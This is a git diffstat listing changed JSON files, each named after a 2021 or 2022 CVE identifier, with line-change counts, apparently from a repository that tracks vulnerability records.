2021/CVE-2021-34481.json | 3 +- 2021/CVE-2021-34486.json | 6 +- 2021/CVE-2021-3449.json | 3 +- 2021/CVE-2021-34496.json | 3 +- 2021/CVE-2021-34523.json | 6 +- 2021/CVE-2021-34527.json | 72 ++- 2021/CVE-2021-34558.json | 3 +- 2021/CVE-2021-34600.json | 3 +- 2021/CVE-2021-34621.json | 9 +- 2021/CVE-2021-34646.json | 6 +- 2021/CVE-2021-34730.json | 3 +- 2021/CVE-2021-34767.json | 3 +- 2021/CVE-2021-34824.json | 3 +- 2021/CVE-2021-3490.json | 6 +- 2021/CVE-2021-3492.json | 3 +- 2021/CVE-2021-3493.json | 39 +- 2021/CVE-2021-35042.json | 15 +- 2021/CVE-2021-35064.json | 3 +- 2021/CVE-2021-3516.json | 3 +- 2021/CVE-2021-35211.json | 9 +- 2021/CVE-2021-35215.json | 3 +- 2021/CVE-2021-35250.json | 3 +- 2021/CVE-2021-35296.json | 3 +- 2021/CVE-2021-35448.json | 3 +- 2021/CVE-2021-35464.json | 6 +- 2021/CVE-2021-35475.json | 3 +- 2021/CVE-2021-35492.json | 3 +- 2021/CVE-2021-35576.json | 3 +- 2021/CVE-2021-35587.json | 3 +- 2021/CVE-2021-3560.json | 75 ++- 2021/CVE-2021-35616.json | 3 +- 2021/CVE-2021-3572.json | 3 +- 2021/CVE-2021-35956.json | 3 +- 2021/CVE-2021-35958.json | 6 +- 2021/CVE-2021-35975.json | 3 +- 2021/CVE-2021-3625.json | 3 +- 2021/CVE-2021-36260.json | 24 +- 2021/CVE-2021-36393.json | 3 +- 2021/CVE-2021-36394.json | 6 +- 2021/CVE-2021-36396.json | 3 +- 2021/CVE-2021-36460.json | 3 +- 2021/CVE-2021-3656.json | 3 +- 2021/CVE-2021-36563.json | 3 +- 2021/CVE-2021-36593.json | 3 +- 2021/CVE-2021-36630.json | 3 +- 2021/CVE-2021-36747.json | 3 +- 2021/CVE-2021-36749.json | 12 +- 2021/CVE-2021-36750.json | 3 +- 2021/CVE-2021-36782.json | 3 +- 2021/CVE-2021-3679.json | 3 +- 2021/CVE-2021-36798.json | 9 +- 2021/CVE-2021-36799.json | 3 +- 2021/CVE-2021-36808.json | 3 +- 2021/CVE-2021-36934.json | 63 +- 2021/CVE-2021-36949.json | 3 +- 2021/CVE-2021-36955.json | 3 +- 2021/CVE-2021-36981.json | 3 +- 2021/CVE-2021-3707.json | 3 +- 2021/CVE-2021-37152.json | 3 +- 2021/CVE-2021-3749.json | 3 +- 2021/CVE-2021-3754.json | 3 +- 2021/CVE-2021-37580.json | 21 +- 2021/CVE-2021-37624.json | 3 +- 2021/CVE-2021-37678.json | 3 +- 2021/CVE-2021-3773.json | 3 +- 2021/CVE-2021-37740.json | 3 +- 2021/CVE-2021-37748.json | 3 +- 2021/CVE-2021-37832.json | 6 +- 2021/CVE-2021-37833.json | 3 +- 2021/CVE-2021-37910.json | 3 +- 2021/CVE-2021-37975.json | 3 +- 2021/CVE-2021-37980.json | 3 +- 2021/CVE-2021-38001.json | 6 +- 2021/CVE-2021-38003.json | 3 +- 2021/CVE-2021-38149.json | 3 +- 2021/CVE-2021-38163.json | 3 +- 2021/CVE-2021-38185.json | 3 +- 2021/CVE-2021-38295.json | 3 +- 2021/CVE-2021-38297.json | 6 +- 2021/CVE-2021-38304.json | 36 -- 2021/CVE-2021-38314.json | 21 +- 2021/CVE-2021-38540.json | 3 +- 2021/CVE-2021-38560.json | 3 +- 2021/CVE-2021-38583.json | 3 +- 2021/CVE-2021-38602.json | 3 +- 2021/CVE-2021-38603.json | 3 +- 2021/CVE-2021-38619.json | 3 +- 2021/CVE-2021-38639.json | 3 +- 2021/CVE-2021-3864.json | 3 +- 2021/CVE-2021-38647.json | 36 +- 2021/CVE-2021-38666.json | 6 +- 2021/CVE-2021-38699.json | 9 +- 2021/CVE-2021-38817.json | 3 +- 2021/CVE-2021-38819.json | 3 +- 2021/CVE-2021-3899.json | 3 +- 2021/CVE-2021-39115.json | 3 +- 2021/CVE-2021-39141.json | 3 +- 2021/CVE-2021-39165.json | 6 +- 2021/CVE-2021-39172.json | 3 +- 2021/CVE-2021-39174.json | 6 +- 2021/CVE-2021-39273.json | 3 +- 2021/CVE-2021-39287.json | 3 +- 2021/CVE-2021-3929.json | 3 +- 2021/CVE-2021-39377.json | 3 +- 2021/CVE-2021-39378.json | 3 +- 2021/CVE-2021-39379.json | 3 +- 2021/CVE-2021-39408.json | 3 +- 2021/CVE-2021-39409.json | 3 +- 2021/CVE-2021-39433.json | 3 +- 2021/CVE-2021-39473.json | 3 +- 2021/CVE-2021-39475.json | 3 +- 2021/CVE-2021-39476.json | 3 +- 2021/CVE-2021-39512.json | 3 +- 2021/CVE-2021-39623.json | 3 +- 2021/CVE-2021-39670.json | 3 +- 2021/CVE-2021-39685.json | 3 +- 2021/CVE-2021-39692.json | 3 +- 2021/CVE-2021-39696.json | 3 +- 2021/CVE-2021-39704.json | 3 +- 2021/CVE-2021-39706.json | 3 +- 2021/CVE-2021-3972.json | 3 +- 2021/CVE-2021-39749.json | 3 +- 2021/CVE-2021-39863.json | 6 +- 2021/CVE-2021-40101.json | 3 +- 2021/CVE-2021-40113.json | 3 +- 2021/CVE-2021-40154.json | 3 +- 2021/CVE-2021-40222.json | 3 +- 2021/CVE-2021-40223.json | 3 +- 2021/CVE-2021-403.json | 3 +- 2021/CVE-2021-40303.json | 3 +- 2021/CVE-2021-4034.json | 489 ++++++++++----- 2021/CVE-2021-40345.json | 3 +- 2021/CVE-2021-40346.json | 15 +- 2021/CVE-2021-40352.json | 3 +- 2021/CVE-2021-40353.json | 3 +- 2021/CVE-2021-40373.json | 3 +- 2021/CVE-2021-40374.json | 3 +- 2021/CVE-2021-40375.json | 3 +- 2021/CVE-2021-4043.json | 3 +- 2021/CVE-2021-40438.json | 27 +- 2021/CVE-2021-4044.json | 3 +- 2021/CVE-2021-40444.json | 108 ++-- 2021/CVE-2021-40449.json | 24 +- 2021/CVE-2021-4045.json | 9 +- 2021/CVE-2021-40492.json | 3 +- 2021/CVE-2021-40512.json | 3 +- 2021/CVE-2021-40513.json | 3 +- 2021/CVE-2021-40514.json | 3 +- 2021/CVE-2021-40531.json | 3 +- 2021/CVE-2021-40539.json | 15 +- 2021/CVE-2021-40822.json | 3 +- 2021/CVE-2021-40839.json | 3 +- 2021/CVE-2021-40845.json | 3 +- 2021/CVE-2021-40859.json | 9 +- 2021/CVE-2021-40865.json | 3 +- 2021/CVE-2021-40870.json | 12 +- 2021/CVE-2021-40875.json | 6 +- 2021/CVE-2021-40903.json | 3 +- 2021/CVE-2021-40904.json | 3 +- 2021/CVE-2021-40905.json | 3 +- 2021/CVE-2021-40906.json | 3 +- 2021/CVE-2021-40978.json | 3 +- 2021/CVE-2021-4104.json | 6 +- 2021/CVE-2021-41073.json | 3 +- 2021/CVE-2021-41074.json | 3 +- 2021/CVE-2021-41078.json | 3 +- 2021/CVE-2021-41081.json | 3 +- 2021/CVE-2021-41091.json | 9 +- 2021/CVE-2021-41117.json | 3 +- 2021/CVE-2021-41160.json | 3 +- 2021/CVE-2021-41182.json | 6 +- 2021/CVE-2021-41184.json | 3 +- 2021/CVE-2021-41277.json | 39 +- 2021/CVE-2021-41338.json | 3 +- 2021/CVE-2021-41349.json | 3 +- 2021/CVE-2021-41351.json | 3 +- 2021/CVE-2021-41381.json | 3 +- 2021/CVE-2021-41511.json | 3 +- 2021/CVE-2021-4154.json | 6 +- 2021/CVE-2021-41560.json | 3 +- 2021/CVE-2021-41643.json | 3 +- 2021/CVE-2021-41644.json | 3 +- 2021/CVE-2021-41645.json | 3 +- 2021/CVE-2021-41646.json | 3 +- 2021/CVE-2021-41647.json | 3 +- 2021/CVE-2021-41648.json | 3 +- 2021/CVE-2021-41649.json | 3 +- 2021/CVE-2021-41651.json | 3 +- 2021/CVE-2021-41652.json | 3 +- 2021/CVE-2021-41653.json | 3 +- 2021/CVE-2021-41730.json | 3 +- 2021/CVE-2021-41773.json | 357 +++++++---- 2021/CVE-2021-41784.json | 3 +- 2021/CVE-2021-41805.json | 3 +- 2021/CVE-2021-41822.json | 3 +- 2021/CVE-2021-4191.json | 6 +- 2021/CVE-2021-41946.json | 3 +- 2021/CVE-2021-41962.json | 3 +- 2021/CVE-2021-42008.json | 6 +- 2021/CVE-2021-42013.json | 84 ++- 2021/CVE-2021-4204.json | 3 +- 2021/CVE-2021-42056.json | 3 +- 2021/CVE-2021-42063.json | 3 +- 2021/CVE-2021-42071.json | 3 +- 2021/CVE-2021-42171.json | 3 +- 2021/CVE-2021-42183.json | 3 +- 2021/CVE-2021-42205.json | 3 +- 2021/CVE-2021-42230.json | 3 +- 2021/CVE-2021-42237.json | 9 +- 2021/CVE-2021-42261.json | 3 +- 2021/CVE-2021-42278.json | 15 +- 2021/CVE-2021-42287.json | 15 +- 2021/CVE-2021-42292.json | 3 +- 2021/CVE-2021-42321.json | 9 +- 2021/CVE-2021-42325.json | 3 +- 2021/CVE-2021-42327.json | 3 +- 2021/CVE-2021-42342.json | 6 +- 2021/CVE-2021-42362.json | 3 +- 2021/CVE-2021-42392.json | 3 +- 2021/CVE-2021-42558.json | 3 +- 2021/CVE-2021-42559.json | 3 +- 2021/CVE-2021-42560.json | 3 +- 2021/CVE-2021-42561.json | 3 +- 2021/CVE-2021-42562.json | 3 +- 2021/CVE-2021-42574.json | 21 +- 2021/CVE-2021-42662.json | 3 +- 2021/CVE-2021-42663.json | 3 +- 2021/CVE-2021-42664.json | 3 +- 2021/CVE-2021-42665.json | 3 +- 2021/CVE-2021-42666.json | 3 +- 2021/CVE-2021-42667.json | 3 +- 2021/CVE-2021-42668.json | 3 +- 2021/CVE-2021-42669.json | 3 +- 2021/CVE-2021-42670.json | 3 +- 2021/CVE-2021-42671.json | 3 +- 2021/CVE-2021-42694.json | 3 +- 2021/CVE-2021-42697.json | 3 +- 2021/CVE-2021-42717.json | 3 +- 2021/CVE-2021-42756.json | 3 +- 2021/CVE-2021-42835.json | 3 +- 2021/CVE-2021-42913.json | 3 +- 2021/CVE-2021-42948.json | 3 +- 2021/CVE-2021-42949.json | 3 +- 2021/CVE-2021-43008.json | 3 +- 2021/CVE-2021-43032.json | 3 +- 2021/CVE-2021-43129.json | 3 +- 2021/CVE-2021-43141.json | 3 +- 2021/CVE-2021-43217.json | 3 +- 2021/CVE-2021-43224.json | 3 +- 2021/CVE-2021-43226.json | 3 +- 2021/CVE-2021-43229.json | 3 +- 2021/CVE-2021-43258.json | 3 +- 2021/CVE-2021-43267.json | 6 +- 2021/CVE-2021-43287.json | 3 +- 2021/CVE-2021-43297.json | 6 +- 2021/CVE-2021-43326.json | 3 +- 2021/CVE-2021-43408.json | 3 +- 2021/CVE-2021-43469.json | 3 +- 2021/CVE-2021-43471.json | 3 +- 2021/CVE-2021-43503.json | 6 +- 2021/CVE-2021-43515.json | 3 +- 2021/CVE-2021-43530.json | 3 +- 2021/CVE-2021-43557.json | 3 +- 2021/CVE-2021-43609.json | 3 +- 2021/CVE-2021-43616.json | 3 +- 2021/CVE-2021-43617.json | 9 +- 2021/CVE-2021-43650.json | 3 +- 2021/CVE-2021-43657.json | 3 +- 2021/CVE-2021-43778.json | 3 +- 2021/CVE-2021-43789.json | 3 +- 2021/CVE-2021-43798.json | 154 +++-- 2021/CVE-2021-43799.json | 3 +- 2021/CVE-2021-43811.json | 3 +- 2021/CVE-2021-43821.json | 3 +- 2021/CVE-2021-43848.json | 3 +- 2021/CVE-2021-43857.json | 3 +- 2021/CVE-2021-43858.json | 3 +- 2021/CVE-2021-43883.json | 3 +- 2021/CVE-2021-43891.json | 3 +- 2021/CVE-2021-43893.json | 3 +- 2021/CVE-2021-43908.json | 3 +- 2021/CVE-2021-43936.json | 3 +- 2021/CVE-2021-44026.json | 3 +- 2021/CVE-2021-44077.json | 6 +- 2021/CVE-2021-44103.json | 3 +- 2021/CVE-2021-44117.json | 3 +- 2021/CVE-2021-44132.json | 3 +- 2021/CVE-2021-44142.json | 9 +- 2021/CVE-2021-44168.json | 3 +- 2021/CVE-2021-44217.json | 3 +- 2021/CVE-2021-44228.json | 1179 ++++++++++++++++++++++++------------ 2021/CVE-2021-44255.json | 3 +- 2021/CVE-2021-44270.json | 3 +- 2021/CVE-2021-4428.json | 3 +- 2021/CVE-2021-44428.json | 3 +- 2021/CVE-2021-44521.json | 6 +- 2021/CVE-2021-44529.json | 6 +- 2021/CVE-2021-44582.json | 3 +- 2021/CVE-2021-44593.json | 3 +- 2021/CVE-2021-44731.json | 3 +- 2021/CVE-2021-44733.json | 3 +- 2021/CVE-2021-44790.json | 3 +- 2021/CVE-2021-44827.json | 3 +- 2021/CVE-2021-44832.json | 6 +- 2021/CVE-2021-44852.json | 3 +- 2021/CVE-2021-44906.json | 3 +- 2021/CVE-2021-44909.json | 3 +- 2021/CVE-2021-44910.json | 3 +- 2021/CVE-2021-45007.json | 3 +- 2021/CVE-2021-45008.json | 3 +- 2021/CVE-2021-45010.json | 9 +- 2021/CVE-2021-45026.json | 3 +- 2021/CVE-2021-45041.json | 3 +- 2021/CVE-2021-45043.json | 3 +- 2021/CVE-2021-45046.json | 30 +- 2021/CVE-2021-45067.json | 3 +- 2021/CVE-2021-45105.json | 27 +- 2021/CVE-2021-45232.json | 36 +- 2021/CVE-2021-45416.json | 6 +- 2021/CVE-2021-45428.json | 3 +- 2021/CVE-2021-45468.json | 3 +- 2021/CVE-2021-45485.json | 3 +- 2021/CVE-2021-45744.json | 6 +- 2021/CVE-2021-45745.json | 6 +- 2021/CVE-2021-45897.json | 3 +- 2021/CVE-2021-45901.json | 3 +- 2021/CVE-2021-45960.json | 9 +- 2021/CVE-2021-46005.json | 3 +- 2021/CVE-2021-46063.json | 9 +- 2021/CVE-2021-46067.json | 6 +- 2021/CVE-2021-46068.json | 6 +- 2021/CVE-2021-46069.json | 6 +- 2021/CVE-2021-46070.json | 6 +- 2021/CVE-2021-46071.json | 6 +- 2021/CVE-2021-46072.json | 6 +- 2021/CVE-2021-46073.json | 6 +- 2021/CVE-2021-46074.json | 6 +- 2021/CVE-2021-46075.json | 6 +- 2021/CVE-2021-46076.json | 6 +- 2021/CVE-2021-46078.json | 6 +- 2021/CVE-2021-46079.json | 6 +- 2021/CVE-2021-46080.json | 6 +- 2021/CVE-2021-46108.json | 3 +- 2021/CVE-2021-46143.json | 3 +- 2021/CVE-2021-46361.json | 3 +- 2021/CVE-2021-46362.json | 3 +- 2021/CVE-2021-46363.json | 3 +- 2021/CVE-2021-46364.json | 3 +- 2021/CVE-2021-46365.json | 3 +- 2021/CVE-2021-46366.json | 3 +- 2021/CVE-2021-46381.json | 3 +- 2021/CVE-2021-46398.json | 6 +- 2021/CVE-2021-46417.json | 3 +- 2021/CVE-2021-46422.json | 42 +- 2021/CVE-2021-46702.json | 3 +- 2021/CVE-2021-46703.json | 3 +- 2021/CVE-2021-46704.json | 6 +- 2021/CVE-2021-521.json | 3 +- 2021/CVE-2021-56789.json | 3 +- 2021/CVE-2021-6857.json | 3 +- 2021/CVE-2021-6901.json | 3 +- 2022/CVE-2022-0155.json | 3 +- 2022/CVE-2022-0165.json | 6 +- 2022/CVE-2022-0185.json | 21 +- 2022/CVE-2022-0219.json | 3 +- 2022/CVE-2022-0236.json | 6 +- 2022/CVE-2022-0265.json | 3 +- 2022/CVE-2022-0316.json | 3 +- 2022/CVE-2022-0332.json | 3 +- 2022/CVE-2022-0337.json | 9 +- 2022/CVE-2022-0412.json | 3 +- 2022/CVE-2022-0435.json | 3 +- 2022/CVE-2022-0439.json | 3 +- 2022/CVE-2022-0441.json | 12 +- 2022/CVE-2022-0482.json | 6 +- 2022/CVE-2022-0486.json | 3 +- 2022/CVE-2022-0492.json | 21 +- 2022/CVE-2022-0529.json | 6 +- 2022/CVE-2022-0540.json | 3 +- 2022/CVE-2022-0543.json | 12 +- 2022/CVE-2022-0591.json | 3 +- 2022/CVE-2022-0666.json | 3 +- 2022/CVE-2022-0725.json | 3 +- 2022/CVE-2022-0739.json | 24 +- 2022/CVE-2022-0778.json | 21 +- 2022/CVE-2022-0811.json | 3 +- 2022/CVE-2022-0824.json | 12 +- 2022/CVE-2022-0847.json | 279 ++++++--- 2022/CVE-2022-0848.json | 6 +- 2022/CVE-2022-0853.json | 3 +- 2022/CVE-2022-0918.json | 3 +- 2022/CVE-2022-0944.json | 18 +- 2022/CVE-2022-0952.json | 3 +- 2022/CVE-2022-0995.json | 9 +- 2022/CVE-2022-0997.json | 3 +- 2022/CVE-2022-1011.json | 3 +- 2022/CVE-2022-1012.json | 3 +- 2022/CVE-2022-1015.json | 30 +- 2022/CVE-2022-1026.json | 9 +- 2022/CVE-2022-10270.json | 3 +- 2022/CVE-2022-1040.json | 21 +- 2022/CVE-2022-1051.json | 3 +- 2022/CVE-2022-1068.json | 3 +- 2022/CVE-2022-1077.json | 3 +- 2022/CVE-2022-1096.json | 3 +- 2022/CVE-2022-1119.json | 3 +- 2022/CVE-2022-1162.json | 6 +- 2022/CVE-2022-1175.json | 3 +- 2022/CVE-2022-1203.json | 3 +- 2022/CVE-2022-1227.json | 3 +- 2022/CVE-2022-1292.json | 15 +- 2022/CVE-2022-1329.json | 18 +- 2022/CVE-2022-1364.json | 3 +- 2022/CVE-2022-1386.json | 12 +- 2022/CVE-2022-1388.json | 195 ++++-- 2022/CVE-2022-1421.json | 3 +- 2022/CVE-2022-1442.json | 3 +- 2022/CVE-2022-1471.json | 6 +- 2022/CVE-2022-14733.json | 3 +- 2022/CVE-2022-1565.json | 3 +- 2022/CVE-2022-1597.json | 3 +- 2022/CVE-2022-1598.json | 3 +- 2022/CVE-2022-1609.json | 12 +- 2022/CVE-2022-1679.json | 6 +- 2022/CVE-2022-1802.json | 3 +- 2022/CVE-2022-1903.json | 3 +- 2022/CVE-2022-1966.json | 3 +- 2022/CVE-2022-1972.json | 3 +- 2022/CVE-2022-20004.json | 3 +- 2022/CVE-2022-20005.json | 3 +- 2022/CVE-2022-20007.json | 6 +- 2022/CVE-2022-20009.json | 3 +- 2022/CVE-2022-20126.json | 3 +- 2022/CVE-2022-20128.json | 3 +- 2022/CVE-2022-20130.json | 3 +- 2022/CVE-2022-20138.json | 6 +- 2022/CVE-2022-20140.json | 3 +- 2022/CVE-2022-20142.json | 6 +- 2022/CVE-2022-20186.json | 6 +- 2022/CVE-2022-20224.json | 6 +- 2022/CVE-2022-20229.json | 3 +- 2022/CVE-2022-20338.json | 9 +- 2022/CVE-2022-20347.json | 9 +- 2022/CVE-2022-20360.json | 3 +- 2022/CVE-2022-20361.json | 3 +- 2022/CVE-2022-20409.json | 3 +- 2022/CVE-2022-20413.json | 3 +- 2022/CVE-2022-20421.json | 3 +- 2022/CVE-2022-20452.json | 3 +- 2022/CVE-2022-20456.json | 3 +- 2022/CVE-2022-20470.json | 3 +- 2022/CVE-2022-20473.json | 6 +- 2022/CVE-2022-20489.json | 6 +- 2022/CVE-2022-20490.json | 3 +- 2022/CVE-2022-20492.json | 3 +- 2022/CVE-2022-20493.json | 3 +- 2022/CVE-2022-20494.json | 3 +- 2022/CVE-2022-20607.json | 3 +- 2022/CVE-2022-20699.json | 9 +- 2022/CVE-2022-2078.json | 3 +- 2022/CVE-2022-20818.json | 3 +- 2022/CVE-2022-20829.json | 3 +- 2022/CVE-2022-20866.json | 3 +- 2022/CVE-2022-2097.json | 3 +- 2022/CVE-2022-2109.json | 3 +- 2022/CVE-2022-21241.json | 3 +- 2022/CVE-2022-21306.json | 3 +- 2022/CVE-2022-21340.json | 3 +- 2022/CVE-2022-21350.json | 3 +- 2022/CVE-2022-21371.json | 9 +- 2022/CVE-2022-21392.json | 3 +- 2022/CVE-2022-21445.json | 6 +- 2022/CVE-2022-21449.json | 37 +- 2022/CVE-2022-21500.json | 3 +- 2022/CVE-2022-21587.json | 9 +- 2022/CVE-2022-21658.json | 3 +- 2022/CVE-2022-21660.json | 6 +- 2022/CVE-2022-21661.json | 33 +- 2022/CVE-2022-21668.json | 3 +- 2022/CVE-2022-21724.json | 3 +- 2022/CVE-2022-21728.json | 3 +- 2022/CVE-2022-21789.json | 3 +- 2022/CVE-2022-21839.json | 3 +- 2022/CVE-2022-2185.json | 6 +- 2022/CVE-2022-21877.json | 3 +- 2022/CVE-2022-21881.json | 3 +- 2022/CVE-2022-21882.json | 18 +- 2022/CVE-2022-21894.json | 18 +- 2022/CVE-2022-21907.json | 48 +- 2022/CVE-2022-21970.json | 3 +- 2022/CVE-2022-21971.json | 9 +- 2022/CVE-2022-21974.json | 3 +- 2022/CVE-2022-21984.json | 3 +- 2022/CVE-2022-21999.json | 3 +- 2022/CVE-2022-22029.json | 3 +- 2022/CVE-2022-22057.json | 3 +- 2022/CVE-2022-22063.json | 3 +- 2022/CVE-2022-22274.json | 9 +- 2022/CVE-2022-22296.json | 3 +- 2022/CVE-2022-22536.json | 6 +- 2022/CVE-2022-22555.json | 3 +- 2022/CVE-2022-22582.json | 3 +- 2022/CVE-2022-22600.json | 3 +- 2022/CVE-2022-22620.json | 9 +- 2022/CVE-2022-22629.json | 3 +- 2022/CVE-2022-22639.json | 3 +- 2022/CVE-2022-22718.json | 3 +- 2022/CVE-2022-22720.json | 3 +- 2022/CVE-2022-22733.json | 3 +- 2022/CVE-2022-2274.json | 9 +- 2022/CVE-2022-22814.json | 3 +- 2022/CVE-2022-22818.json | 3 +- 2022/CVE-2022-22822.json | 3 +- 2022/CVE-2022-22828.json | 3 +- 2022/CVE-2022-22845.json | 3 +- 2022/CVE-2022-22850.json | 3 +- 2022/CVE-2022-22851.json | 3 +- 2022/CVE-2022-22852.json | 3 +- 2022/CVE-2022-22885.json | 6 +- 2022/CVE-2022-22909.json | 6 +- 2022/CVE-2022-22916.json | 3 +- 2022/CVE-2022-22947.json | 165 +++-- 2022/CVE-2022-22948.json | 3 +- 2022/CVE-2022-22954.json | 81 ++- 2022/CVE-2022-22963.json | 81 ++- 2022/CVE-2022-22965.json | 232 ++++--- 2022/CVE-2022-22966.json | 3 +- 2022/CVE-2022-22968.json | 3 +- 2022/CVE-2022-22971.json | 3 +- 2022/CVE-2022-22972.json | 9 +- 2022/CVE-2022-22976.json | 3 +- 2022/CVE-2022-22978.json | 21 +- 2022/CVE-2022-22980.json | 18 +- 2022/CVE-2022-23046.json | 12 +- 2022/CVE-2022-23093.json | 6 +- 2022/CVE-2022-23131.json | 57 +- 2022/CVE-2022-23222.json | 12 +- 2022/CVE-2022-23253.json | 3 +- 2022/CVE-2022-23270.json | 3 +- 2022/CVE-2022-23277.json | 3 +- 2022/CVE-2022-23303.json | 3 +- 2022/CVE-2022-23305.json | 9 +- 2022/CVE-2022-2333.json | 3 +- 2022/CVE-2022-23342.json | 3 +- 2022/CVE-2022-23361.json | 3 +- 2022/CVE-2022-23378.json | 3 +- 2022/CVE-2022-23529.json | 6 +- 2022/CVE-2022-23614.json | 6 +- 2022/CVE-2022-23642.json | 3 +- 2022/CVE-2022-23648.json | 3 +- 2022/CVE-2022-23731.json | 3 +- 2022/CVE-2022-23773.json | 9 +- 2022/CVE-2022-23779.json | 6 +- 2022/CVE-2022-23808.json | 3 +- 2022/CVE-2022-23812.json | 3 +- 2022/CVE-2022-23852.json | 3 +- 2022/CVE-2022-23861.json | 3 +- 2022/CVE-2022-23862.json | 3 +- 2022/CVE-2022-23884.json | 3 +- 2022/CVE-2022-23909.json | 3 +- 2022/CVE-2022-23935.json | 9 +- 2022/CVE-2022-23940.json | 3 +- 2022/CVE-2022-23967.json | 3 +- 2022/CVE-2022-23988.json | 3 +- 2022/CVE-2022-23990.json | 3 +- 2022/CVE-2022-24086.json | 24 +- 2022/CVE-2022-24087.json | 3 +- 2022/CVE-2022-24112.json | 30 +- 2022/CVE-2022-24122.json | 3 +- 2022/CVE-2022-24124.json | 9 +- 2022/CVE-2022-24125.json | 3 +- 2022/CVE-2022-2414.json | 12 +- 2022/CVE-2022-24181.json | 3 +- 2022/CVE-2022-24227.json | 3 +- 2022/CVE-2022-24342.json | 3 +- 2022/CVE-2022-24348.json | 3 +- 2022/CVE-2022-24439.json | 3 +- 2022/CVE-2022-24442.json | 3 +- 2022/CVE-2022-24449.json | 3 +- 2022/CVE-2022-24481.json | 3 +- 2022/CVE-2022-24483.json | 3 +- 2022/CVE-2022-24491.json | 3 +- 2022/CVE-2022-24494.json | 3 +- 2022/CVE-2022-24497.json | 3 +- 2022/CVE-2022-24500.json | 3 +- 2022/CVE-2022-24611.json | 3 +- 2022/CVE-2022-24637.json | 21 +- 2022/CVE-2022-24644.json | 6 +- 2022/CVE-2022-24654.json | 3 +- 2022/CVE-2022-2466.json | 3 +- 2022/CVE-2022-24675.json | 3 +- 2022/CVE-2022-24693.json | 3 +- 2022/CVE-2022-24702.json | 3 +- 2022/CVE-2022-24706.json | 9 +- 2022/CVE-2022-24707.json | 3 +- 2022/CVE-2022-24713.json | 3 +- 2022/CVE-2022-24715.json | 9 +- 2022/CVE-2022-24716.json | 15 +- 2022/CVE-2022-24734.json | 6 +- 2022/CVE-2022-24760.json | 3 +- 2022/CVE-2022-24780.json | 3 +- 2022/CVE-2022-24818.json | 3 +- 2022/CVE-2022-24834.json | 6 +- 2022/CVE-2022-24853.json | 3 +- 2022/CVE-2022-24924.json | 3 +- 2022/CVE-2022-24934.json | 12 +- 2022/CVE-2022-24990.json | 18 +- 2022/CVE-2022-24992.json | 3 +- 2022/CVE-2022-24999.json | 3 +- 2022/CVE-2022-25012.json | 6 +- 2022/CVE-2022-25018.json | 3 +- 2022/CVE-2022-25020.json | 3 +- 2022/CVE-2022-25022.json | 3 +- 2022/CVE-2022-25060.json | 3 +- 2022/CVE-2022-25061.json | 3 +- 2022/CVE-2022-25062.json | 3 +- 2022/CVE-2022-25063.json | 3 +- 2022/CVE-2022-25064.json | 6 +- 2022/CVE-2022-25089.json | 3 +- 2022/CVE-2022-25090.json | 3 +- 2022/CVE-2022-25235.json | 3 +- 2022/CVE-2022-25236.json | 3 +- 2022/CVE-2022-25256.json | 3 +- 2022/CVE-2022-25257.json | 6 +- 2022/CVE-2022-25258.json | 3 +- 2022/CVE-2022-25260.json | 3 +- 2022/CVE-2022-25262.json | 3 +- 2022/CVE-2022-25265.json | 3 +- 2022/CVE-2022-25313.json | 6 +- 2022/CVE-2022-25314.json | 3 +- 2022/CVE-2022-25315.json | 6 +- 2022/CVE-2022-25365.json | 3 +- 2022/CVE-2022-25375.json | 3 +- 2022/CVE-2022-2546.json | 6 +- 2022/CVE-2022-25479.json | 15 +- 2022/CVE-2022-25636.json | 9 +- 2022/CVE-2022-25640.json | 3 +- 2022/CVE-2022-25765.json | 24 +- 2022/CVE-2022-25813.json | 3 +- 2022/CVE-2022-25845.json | 9 +- 2022/CVE-2022-2586.json | 6 +- 2022/CVE-2022-2588.json | 24 +- 2022/CVE-2022-2590.json | 3 +- 2022/CVE-2022-25927.json | 3 +- 2022/CVE-2022-25943.json | 6 +- 2022/CVE-2022-25949.json | 3 +- 2022/CVE-2022-2602.json | 9 +- 2022/CVE-2022-26133.json | 6 +- 2022/CVE-2022-26134.json | 201 ++++-- 2022/CVE-2022-26135.json | 6 +- 2022/CVE-2022-26138.json | 12 +- 2022/CVE-2022-26159.json | 3 +- 2022/CVE-2022-26265.json | 6 +- 2022/CVE-2022-26269.json | 3 +- 2022/CVE-2022-26318.json | 9 +- 2022/CVE-2022-26377.json | 3 +- 2022/CVE-2022-2639.json | 9 +- 2022/CVE-2022-26485.json | 3 +- 2022/CVE-2022-26488.json | 3 +- 2022/CVE-2022-26503.json | 3 +- 2022/CVE-2022-26629.json | 6 +- 2022/CVE-2022-26717.json | 3 +- 2022/CVE-2022-26726.json | 6 +- 2022/CVE-2022-26757.json | 3 +- 2022/CVE-2022-26763.json | 3 +- 2022/CVE-2022-26766.json | 3 +- 2022/CVE-2022-26809.json | 30 +- 2022/CVE-2022-26923.json | 18 +- 2022/CVE-2022-26927.json | 3 +- 2022/CVE-2022-26937.json | 9 +- 2022/CVE-2022-26965.json | 3 +- 2022/CVE-2022-27134.json | 3 +- 2022/CVE-2022-27226.json | 3 +- 2022/CVE-2022-27251.json | 3 +- 2022/CVE-2022-27254.json | 3 +- 2022/CVE-2022-27255.json | 6 +- 2022/CVE-2022-27413.json | 3 +- 2022/CVE-2022-27414.json | 3 +- 2022/CVE-2022-27434.json | 3 +- 2022/CVE-2022-27438.json | 3 +- 2022/CVE-2022-27499.json | 3 +- 2022/CVE-2022-27502.json | 3 +- 2022/CVE-2022-27518.json | 3 +- 2022/CVE-2022-27646.json | 3 +- 2022/CVE-2022-27665.json | 3 +- 2022/CVE-2022-27666.json | 6 +- 2022/CVE-2022-27772.json | 3 +- 2022/CVE-2022-27925.json | 39 +- 2022/CVE-2022-27927.json | 3 +- 2022/CVE-2022-27997.json | 3 +- 2022/CVE-2022-28077.json | 3 +- 2022/CVE-2022-28078.json | 3 +- 2022/CVE-2022-28079.json | 3 +- 2022/CVE-2022-28080.json | 3 +- 2022/CVE-2022-28099.json | 3 +- 2022/CVE-2022-28113.json | 3 +- 2022/CVE-2022-28117.json | 6 +- 2022/CVE-2022-28118.json | 3 +- 2022/CVE-2022-28132.json | 3 +- 2022/CVE-2022-28171.json | 3 +- 2022/CVE-2022-28219.json | 9 +- 2022/CVE-2022-28281.json | 3 +- 2022/CVE-2022-28282.json | 3 +- 2022/CVE-2022-28346.json | 15 +- 2022/CVE-2022-28368.json | 9 +- 2022/CVE-2022-28381.json | 3 +- 2022/CVE-2022-28452.json | 3 +- 2022/CVE-2022-28454.json | 3 +- 2022/CVE-2022-28508.json | 3 +- 2022/CVE-2022-28590.json | 3 +- 2022/CVE-2022-28598.json | 3 +- 2022/CVE-2022-28601.json | 3 +- 